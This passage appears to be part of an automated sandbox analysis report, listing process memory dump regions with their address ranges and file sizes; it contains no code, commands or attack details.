                                                                                              368KB

                                                                                            • memory/1960-91-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                              Filesize

                                                                                              8KB

                                                                                            • memory/1960-70-0x0000000000000000-mapping.dmp
                                                                                            • memory/2004-173-0x0000000000000000-mapping.dmp
                                                                                            • memory/2068-271-0x00000000001B0000-0x00000000001BC000-memory.dmp
                                                                                              Filesize

                                                                                              48KB

                                                                                            • memory/2068-255-0x0000000000000000-mapping.dmp
                                                                                            • memory/2084-194-0x0000000000000000-mapping.dmp
                                                                                            • memory/2084-251-0x0000000000000000-mapping.dmp
                                                                                            • memory/2084-178-0x0000000000000000-mapping.dmp
                                                                                            • memory/2092-224-0x0000000000000000-mapping.dmp
                                                                                            • memory/2124-179-0x0000000000000000-mapping.dmp
                                                                                            • memory/2140-309-0x00000000007C0000-0x00000000007C1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2164-180-0x0000000000000000-mapping.dmp
                                                                                            • memory/2320-236-0x0000000000000000-mapping.dmp
                                                                                            • memory/2344-290-0x00000000003E0000-0x00000000003E1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2380-302-0x0000000004AA2000-0x0000000004AA3000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2380-301-0x0000000004AA0000-0x0000000004AA1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2420-232-0x0000000000000000-mapping.dmp
                                                                                            • memory/2460-185-0x0000000000000000-mapping.dmp
                                                                                            • memory/2640-289-0x000000007EF30000-0x000000007EF31000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2640-282-0x0000000004AB2000-0x0000000004AB3000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2640-287-0x00000000058C0000-0x00000000058C1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2640-280-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2640-281-0x0000000004AB0000-0x0000000004AB1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2640-283-0x0000000000E00000-0x0000000000E01000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2640-279-0x00000000009F0000-0x00000000009F1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2640-284-0x0000000004A70000-0x0000000004A71000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2656-295-0x00000000022B0000-0x0000000002EFA000-memory.dmp
                                                                                              Filesize

                                                                                              12.3MB

                                                                                            • memory/2656-296-0x00000000022B0000-0x0000000002EFA000-memory.dmp
                                                                                              Filesize

                                                                                              12.3MB

                                                                                            • memory/2680-292-0x00000000049A2000-0x00000000049A3000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2680-291-0x00000000049A0000-0x00000000049A1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2684-219-0x0000000000000000-mapping.dmp
                                                                                            • memory/2684-225-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                              Filesize

                                                                                              8KB

                                                                                            • memory/2684-226-0x0000000000A70000-0x0000000000B71000-memory.dmp
                                                                                              Filesize

                                                                                              1.0MB

                                                                                            • memory/2684-227-0x00000000002D0000-0x000000000032C000-memory.dmp
                                                                                              Filesize

                                                                                              368KB

                                                                                            • memory/2696-218-0x0000000000000000-mapping.dmp
                                                                                            • memory/2712-234-0x0000000000000000-mapping.dmp
                                                                                            • memory/2736-216-0x0000000000000000-mapping.dmp
                                                                                            • memory/2896-273-0x0000000000000000-mapping.dmp
                                                                                            • memory/2928-315-0x0000000004AF2000-0x0000000004AF3000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2928-314-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2932-237-0x0000000000000000-mapping.dmp
                                                                                            • memory/2948-238-0x0000000000000000-mapping.dmp
                                                                                            • memory/2960-307-0x00000000001B0000-0x00000000001B1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/2960-308-0x00000000001D0000-0x00000000001FE000-memory.dmp
                                                                                              Filesize

                                                                                              184KB

                                                                                            • memory/3040-222-0x0000000000000000-mapping.dmp
                                                                                            • memory/3120-206-0x00000000003C0000-0x00000000003C1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/3120-203-0x0000000000000000-mapping.dmp
                                                                                            • memory/3156-240-0x0000000000000000-mapping.dmp
                                                                                            • memory/3168-303-0x00000000022B0000-0x0000000002EFA000-memory.dmp
                                                                                              Filesize

                                                                                              12.3MB

                                                                                            • memory/3168-304-0x00000000022B0000-0x0000000002EFA000-memory.dmp
                                                                                              Filesize

                                                                                              12.3MB

                                                                                            • memory/3196-243-0x0000000000000000-mapping.dmp
                                                                                            • memory/3216-241-0x0000000000000000-mapping.dmp
                                                                                            • memory/3256-242-0x0000000000000000-mapping.dmp
                                                                                            • memory/3328-245-0x0000000000000000-mapping.dmp
                                                                                            • memory/3332-298-0x00000000049A2000-0x00000000049A3000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/3332-297-0x00000000049A0000-0x00000000049A1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/3408-247-0x0000000000000000-mapping.dmp
                                                                                            • memory/3448-207-0x0000000000000000-mapping.dmp
                                                                                            • memory/3472-248-0x0000000000000000-mapping.dmp
                                                                                            • memory/3484-249-0x0000000000000000-mapping.dmp
                                                                                            • memory/3504-208-0x0000000000000000-mapping.dmp
                                                                                            • memory/3520-250-0x0000000000000000-mapping.dmp
                                                                                            • memory/3536-312-0x0000000000F30000-0x0000000000F31000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/3536-313-0x0000000000F32000-0x0000000000F33000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/3620-254-0x0000000000000000-mapping.dmp
                                                                                            • memory/3624-210-0x000007FEFC471000-0x000007FEFC473000-memory.dmp
                                                                                              Filesize

                                                                                              8KB

                                                                                            • memory/3656-300-0x00000000022B0000-0x0000000002EFA000-memory.dmp
                                                                                              Filesize

                                                                                              12.3MB

                                                                                            • memory/3656-299-0x00000000022B0000-0x0000000002EFA000-memory.dmp
                                                                                              Filesize

                                                                                              12.3MB

                                                                                            • memory/3704-258-0x0000000000000000-mapping.dmp
                                                                                            • memory/3720-259-0x0000000000000000-mapping.dmp
                                                                                            • memory/3756-260-0x0000000000000000-mapping.dmp
                                                                                            • memory/3784-261-0x0000000000000000-mapping.dmp
                                                                                            • memory/3784-263-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                              Filesize

                                                                                              64KB

                                                                                            • memory/3784-264-0x0000000000270000-0x0000000000282000-memory.dmp
                                                                                              Filesize

                                                                                              72KB

                                                                                            • memory/3828-265-0x0000000000000000-mapping.dmp
                                                                                            • memory/3836-267-0x0000000000402F68-mapping.dmp
                                                                                            • memory/3836-266-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                              Filesize

                                                                                              48KB

                                                                                            • memory/3840-269-0x0000000000000000-mapping.dmp
                                                                                            • memory/3852-211-0x0000000000000000-mapping.dmp
                                                                                            • memory/3864-256-0x0000000000000000-mapping.dmp
                                                                                            • memory/3912-310-0x00000000011A0000-0x00000000011A1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/3912-311-0x00000000011A2000-0x00000000011A3000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/3932-213-0x0000000000000000-mapping.dmp
                                                                                            • memory/3992-306-0x0000000004AB2000-0x0000000004AB3000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/3992-305-0x0000000004AB0000-0x0000000004AB1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB